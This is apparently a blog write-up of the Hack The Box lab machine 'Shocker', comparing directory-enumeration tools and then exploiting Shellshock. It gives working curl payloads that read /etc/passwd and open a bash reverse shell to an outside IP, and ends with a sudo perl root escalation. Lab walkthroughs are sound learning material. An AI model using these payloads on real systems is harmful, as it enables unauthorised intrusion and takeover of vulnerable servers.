Shocker
Shocker was not technically next in line; Beep was. I have started Beep but I’ll return to that later. I didn’t know what this was but I guessed from the name.
Ports
HTTP and SSH on a non-standard port: 2222.
HTTP
On the front page of the webserver is a picture of a bug with a hammer and the phrase “don’t bug me”. I was guessing at this point that this was probably shellshock . Which it is. This then, is mostly an exercise in enumeration.
I’ve been liking dirsearch but on this box it let me down; observe:
┌──( root💀kali) -[/opt/htb/shocker]
└─# python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/common.txt -e sh
/opt/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 ( 1.26.2) or chardet ( 4.0.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn' t match a supported "
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: sh | HTTP method: GET | Threads: 30 | Wordlist size: 4681
Error Log: /opt/dirsearch/logs/errors-21-03-14_00-02-19.log
Target: http://10.10.10.56/cgi-bin/
Output File: /opt/dirsearch/reports/10.10.10.56/cgi-bin_21-03-14_00-02-19.txt
[00:02:19] Starting:
Task Completed
Nothing found, and it’s the same whether I use /cgi-bin/ or /cgi-bin without the trailing slash. What about gobuster , which was my old favourite before dirsearch ?
┌──( root💀kali) -[/opt/htb/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh
===============================================================
Gobuster v3.1.0
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @firefart)
===============================================================
[ +] Url: http://10.10.10.56/cgi-bin/
[ +] Method: GET
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Negative Status codes: 404
[ +] User Agent: gobuster/3.1.0
[ +] Extensions: sh
[ +] Timeout: 10s
===============================================================
2021/03/14 00:04:30 Starting gobuster in directory enumeration mode
===============================================================
/.hta ( Status: 403) [ Size: 298]
/.htaccess ( Status: 403) [ Size: 303]
/.htpasswd ( Status: 403) [ Size: 303]
/.hta.sh ( Status: 403) [ Size: 301]
/.htaccess.sh ( Status: 403) [ Size: 306]
/.htpasswd.sh ( Status: 403) [ Size: 306]
/user.sh ( Status: 200) [ Size: 118]
===============================================================
2021/03/14 00:08:20 Finished
===============================================================
Found it (user.sh) no problem. Very disappointing dirsearch . I’ve heard good things about feroxbuster lately; let’s try that:
┌──( root💀kali) -[/opt/htb/shocker]
└─# feroxbuster -u http://10.10.10.56/cgi-bin/ -x sh -w /usr/share/seclists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_ / | | \ |__
| |___ | \ | \ | \_ _, \_ _/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.56/cgi-bin/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [ 200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout ( secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [ sh]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 7l 17w 0c http://10.10.10.56/cgi-bin/user.sh
403 11l 32w 303c http://10.10.10.56/cgi-bin/.htaccess
403 11l 32w 306c http://10.10.10.56/cgi-bin/.htaccess.sh
403 11l 32w 298c http://10.10.10.56/cgi-bin/.hta
403 11l 32w 301c http://10.10.10.56/cgi-bin/.hta.sh
403 11l 32w 303c http://10.10.10.56/cgi-bin/.htpasswd
403 11l 32w 306c http://10.10.10.56/cgi-bin/.htpasswd.sh
[ ####################] - 46s 9362/9362 0s found:7 errors:0
[ ####################] - 46s 9362/9362 202/s http://10.10.10.56/cgi-bin/
Not only did it find it, but it was noticeably quicker than gobuster. A new king has been crowned.
Exploitation
Is trivial:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.10.56/cgi-bin/user.sh
To show it’s working, and then a shell via:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/1234 0>&1'" \
http://10.10.10.56/cgi-bin/user.sh
Root
GTFOBins from HTB? They don’t do that anymore:
──( root💀kali) -[/opt/htb/shocker]
└─# nc -nvlp 1234
listening on [ any] 1234 ...
connect to [ 10.10.14.10] from ( UNKNOWN) [ 10.10.10.56] 37280
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path = /usr/local/sbin\: /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin\: /snap/bin
User shelly may run the following commands on Shocker:
( root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
cd /root
cat root.txt
# flag goes here
id ; hostname
uid = 0( root) gid = 0( root) groups = 0( root)
Shocker
I also did h4cked and Badbyte from THM yesterday but I don’t have anything to say about them. Proxychains nmap was mildly interesting.